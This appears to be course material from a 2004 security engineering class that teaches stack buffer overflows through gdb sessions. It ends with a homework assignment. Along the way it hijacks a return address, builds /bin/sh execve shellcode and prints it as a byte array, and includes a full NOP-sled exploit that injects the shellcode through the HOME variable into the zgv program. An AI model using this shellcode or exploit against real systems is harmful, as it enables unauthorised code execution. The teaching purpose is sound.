1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }
2
3 gcc -ggdb b.c –This creates a.out gdb a.out GNU gdb Red Hat Linux ( ) Copyright 2002 Free Software Foundation, Inc.
4 (GDB) disas main Dump of assembler code for function main: 0x : push %ebp 0x : mov %esp,%ebp 0x804838b : sub $0x8,%esp 0x804838e : and $0xfffffff0,%esp 0x : mov $0x0,%eax 0x : sub %eax,%esp 0x : call 0x804835c 0x804839d : mov $0x0,%eax 0x80483a2 : leave 0x80483a3 : ret End of assembler dump.
5 (gdb) disas silly Dump of assembler code for function silly: 0x804835c : push %ebp 0x804835d : mov %esp,%ebp 0x804835f : sub $0x28,%esp 0x : sub $0xc,%esp 0x : lea 0xffffffd8(%ebp),%eax 0x : push %eax 0x : call 0x804827c
6 0x804836e : add $0x10,%esp 0x : sub $0x8,%esp 0x : lea 0xffffffd8(%ebp),%eax 0x : push %eax 0x : push $0x x804837d : call 0x804829c 0x : add $0x10,%esp 0x : leave 0x : ret End of assembler dump.
7 $ gdb a.out GNU gdb Red Hat Linux ( ) [...] (gdb) run Starting program: /home/sherif/c/bo/a.out AAAAAAAAAA Program exited normally.
8 (gdb) run Starting program: /home/sherif/c/bo/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGTRAP, Trace/breakpoint trap. 0x421341e9 in environ () from /lib/i686/libc.so.6
9 Starting program: /home/sherif/c/bo/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA Program received signal SIGSEGV, Segmentation fault. 0x in ?? () (gdb) info registers eax 0x7b 123 ecx 0x42134d edx 0x7b 123 ebx 0x c esp 0xbffff370 0xbffff370 ebp 0x x esi 0x edi 0x421341e eip 0x x eflags 0x
10 #include void notcalled(){ puts("no one called me!\n"); } void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }
11 (gdb) disas notcalled Dump of assembler code for function notcalled: 0x804838c : push %ebp 0x804838d : mov %esp,%ebp 0x804838f : sub $0x8,%esp 0x : sub $0xc,%esp 0x : push $0x804844c 0x804839a : call 0x80482ac 0x804839f : add $0x10,%esp 0x80483a2 : leave 0x80483a3 : ret End of assembler dump.
12 (gdb) run Starting program: /home/sherif/c/bo/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNO PQRSTUVWXYZ Program received signal SIGSEGV, Segmentation fault. 0x in ?? () (gdb) info register
13 eax 0x38 56 ecx 0x42134d edx 0x38 56 ebx 0x c esp 0xbffff880 0xbffff880 ebp 0x4f4e4d4c 0x4f4e4d4c esi 0x edi 0x421341e eip 0x x [...]
14
15 main(){ printf( "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNO%c%c%c%cTU VWXYZ\n", 0x8c, 0x83, 0x04, 0x08 ); }
16 bo]$./b2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKL MNTUVWXYZ bo]$./b2 |./a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKL MNTUVWXYZ no one called me! Segmentation fault
17 Dump of assembler code for function execve: 0xb09d0 : push %ebp 0xb09d1 : mov %esp,%ebp 0xb09d3 : sub $0x18,%esp 0xb09d6 : mov %ebx,0xfffffff4(%ebp) 0xb09d9 : call 0x1579d 0xb09de : add $0x8984e,%ebx 0xb09e4 : mov %edi,0xfffffffc(%ebp) 0xb09e7 : mov 0x1b8(%ebx),%eax 0xb09ed : mov 0x8(%ebp),%edi 0xb09f0 : mov %esi,0xfffffff8(%ebp) 0xb09f3 : test %eax,%eax 0xb09f5 : jne 0xb0a30 0xb09f7 : mov 0xc(%ebp),%ecx 0xb09fa : mov 0x10(%ebp),%edx 0xb09fd : push %ebx 0xb09fe : mov %edi,%ebx 0xb0a00 : mov $0xb,%eax 0xb0a05 : int $0x80
18.global code_start.global code_end.data code_start: jmp my_st_pt my_call: popl %esi movl %esi,0x8(%esi) xor %eax,%eax /* put 0 in %eax */ movb %eax,0x7(%esi) /* put terminating 0*/ movl %eax,0xc(%esi) /* another 0 to */ my_execve: movb $0xb,%al /* execve( */ movl %esi,%ebx /* " /bin/sh ", lea 0x8(%esi),%ecx /* & of "/bin/sh " xor %edx,%edx /* NULL )*/ int $0x80 /* */ my_st_pt: call my_call.string "/bin/shX" code_end:
19 extern void code_start(); extern void code_end(); #include main() { ((void (*)(void)) code_start)(); }
20 extern void code_start(); extern void code_end(); #include main() { char *p = (char*) code_start; printf("char code[]={"); while(*p){ printf("0x%x, ", (unsigned char)*p++); } printf("};"); }
21 char code[]={0xeb, 0x17, 0x5e, 0x89, 0x76, 0x8, 0x31, 0xc0, 0x88, 0x46, 0x7, 0x89, 0x46, 0xc, 0xb0, 0xb, 0x89, 0xf3, 0x8d, 0x4e, 0x8, 0x31, 0xd2, 0xcd, 0x80, 0xe8, 0xe4, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x58, 0x00 };
22 char code[]={0xeb, 0x17, 0x5e, 0x89, 0x76, 0x8, 0x31, 0xc0, 0x88, 0x46, 0x7, 0x89, 0x46, 0xc, 0xb0, 0xb, 0x89, 0xf3, 0x8d, 0x4e, 0x8, 0x31, 0xd2, 0xcd, 0x80, 0xe8, 0xe4, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x58, 0x00 }; main(){ ((void (*)(void)) code )(); }
23
24 #include main(){ char *params[]={"/bin/ls", "/", NULL}; char *env[]={"TERM=dumb", NULL}; execve("/bin/ls", params, env); }
25.global code_start.global code_end.data code_start: jmp my_st_pt my_call: popl %esi movl %esi,0x8(%esi) xor %eax,%eax /* put 0 in %eax */ movb %eax,0x7(%esi) /* put terminating 0*/ movl %eax,0xc(%esi) /* another 0 to */ my_execve: movb $0xb,%al /* execve( */ movl %esi,%ebx /* " /bin/sh ", lea 0x8(%esi),%ecx /* & of "/bin/sh " xor %edx,%edx /* NULL )*/ int $0x80 /* */ my_st_pt: call my_call.string "/bin/shX" code_end:
26 #include /* This is the minimal shellcode from the tutorial */ static char shellcode[]= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\ x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe 4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; #define NOP 0x90 #define LEN 1032 #define RET 0xbffff574
27 int main(){ char buffer[LEN]; long retaddr = RET; int i; fprintf(stderr,"using address 0x%lx\n",retaddr); for (i=0;i<LEN;i+=4) *(long *)&buffer[i] = retaddr; for (i=0;i<(LEN-strlen(shellcode)-100);i++) *(buffer+i) = NOP; memcpy(buffer+i,shellcode,strlen(shellcode)); setenv("HOME", buffer, 1); execlp("zgv","zgv",NULL); return 0; }
28 CSCI : Security EngineeringSpring 2004 Assignment 3: Due Tuesday, March 16th, 2004 A colleague has proposed the following program as a simple means of copying the first command-line argument to a local variable. You are asked to demonstrate that is an insecure program by showing that it may allow for the execution of an arbitrary command. #include main(int argc, char** argv){ char s[1000]; strcpy(s, argv[1]); puts(s); }